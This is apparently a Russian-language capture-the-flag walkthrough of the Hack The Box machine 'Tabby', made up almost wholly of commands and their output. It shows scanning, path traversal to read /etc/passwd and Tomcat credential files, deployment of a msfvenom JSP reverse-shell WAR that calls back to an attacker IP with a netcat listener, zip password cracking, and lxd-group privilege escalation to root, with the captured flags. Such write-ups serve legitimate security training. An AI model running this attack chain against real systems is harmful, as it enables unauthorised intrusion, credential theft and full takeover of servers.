Обзор сервисов
$ nmapAutomator.sh -H 10.10.10.194 -t Full
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ gobuster dir -u http://10.10.10.194 -w /usr/share/dirb/wordlists/common.txt -x php,txt,pdf,jsp,jspx
/assets (Status: 301) [Size: 313] [--> http://10.10.10.194/assets/]
/favicon.ico (Status: 200) [Size: 766]
/files (Status: 301) [Size: 312] [--> http://10.10.10.194/files/]
/index.php (Status: 200) [Size: 14175]
/index.php (Status: 200) [Size: 14175]
/news.php (Status: 200) [Size: 0]
/Readme.txt (Status: 200) [Size: 1574]
/server-status (Status: 403) [Size: 277]
$ gobuster dir -u http://10.10.10.194/files/ -w /usr/share/dirb/wordlists/common.txt -x php,txt,pdf,jsp,jspx
/archive (Status: 301) [Size: 320] [--> http://10.10.10.194/files/archive/]
/statement (Status: 200) [Size: 6507]
Посмотрим код страницы http://10.10.10.194/files/statement:
<li><a href="http://megahosting.htb/news.php?file=statement">News</a></li>
Path Traversal
=> http://10.10.10.194/news.php?file=../../../../../../../../../../../etc/passwd
=> http://10.10.10.194:8080/manager/html
находим conf/tomcat-users.xml
=> /usr/share/tomcat9
Найдем пример каталога tomcathttps://archlinux.org/packages/extra/any/tomcat9/files/:
etc/
etc/tomcat9/
etc/tomcat9/Catalina/
etc/tomcat9/catalina.policy
etc/tomcat9/catalina.properties
etc/tomcat9/context.xml
etc/tomcat9/jaspic-providers.xml
etc/tomcat9/jaspic-providers.xsd
etc/tomcat9/logging.properties
etc/tomcat9/server.xml
etc/tomcat9/tomcat-users.xml
etc/tomcat9/tomcat-users.xsd
etc/tomcat9/web.xml
=>
curl http://10.10.10.194/news.php?file=../../../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
=> tomcat $3cureP4s5w0rd123!
https://tomcat.apache.org/tomcat-9.0-doc/host-manager-howto.html
$ USERNAME=tomcat
$ PASSWORD=\$3cureP4s5w0rd123!
$ curl -u ${USERNAME}:${PASSWORD} http://10.10.10.194:8080/manager/text/list
/:running:0:ROOT
/examples:running:9:/usr/share/tomcat9-examples/examples
/host-manager:running:1:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
Reverse Shell
=> развернем WAR по инструкции
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f war > shell.war
curl -u ${USERNAME}:${PASSWORD} -T shell.war http://10.10.10.194:8080/manager/text/deploy?path=/shell
nc -lnvp 1234
Перейдем на http://10.10.10.194:8080/shell.
Брутфорс
mkdir /tmp/backup
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -v -u 16162020_backup.zip
admin@it
unzip 16162020_backup.zip
Флаг пользователя
$ su - ash
admin@it
6. ash@tabby:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:4c:4b brd ff:ff:ff:ff:ff:ff
inet 10.10.10.194/24 brd 10.10.10.255 scope global ens192
valid_lft forever preferred_lft forever
ash@tabby:~$ cat user.txt
3e7b3f425d48de61a69c59c306929362
Linenum
=> находим, что пользователь состоит в группе lxd
https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation - воспользуемся методом 2
На локальной машине:
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a x86_64
На удаленной машине:
lxc image import ./alpine*.tar.gz --alias myimage # (in home dir)
lxd init
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
Флаг суперпользователя
$ cd /mnt/root/root/
/mnt/root/root # ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP qlen 1000
link/ether 00:16:3e:24:6b:49 brd ff:ff:ff:ff:ff:ff
inet 10.216.71.233/24 brd 10.216.71.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fd42:c3f4:ad23:528c:216:3eff:fe24:6b49/64 scope global dynamic
valid_lft 3554sec preferred_lft 3554sec
inet6 fe80::216:3eff:fe24:6b49/64 scope link
valid_lft forever preferred_lft forever
/mnt/root/root # cat root.txt
f893ff2d9bad98c92df7938ffe007bc6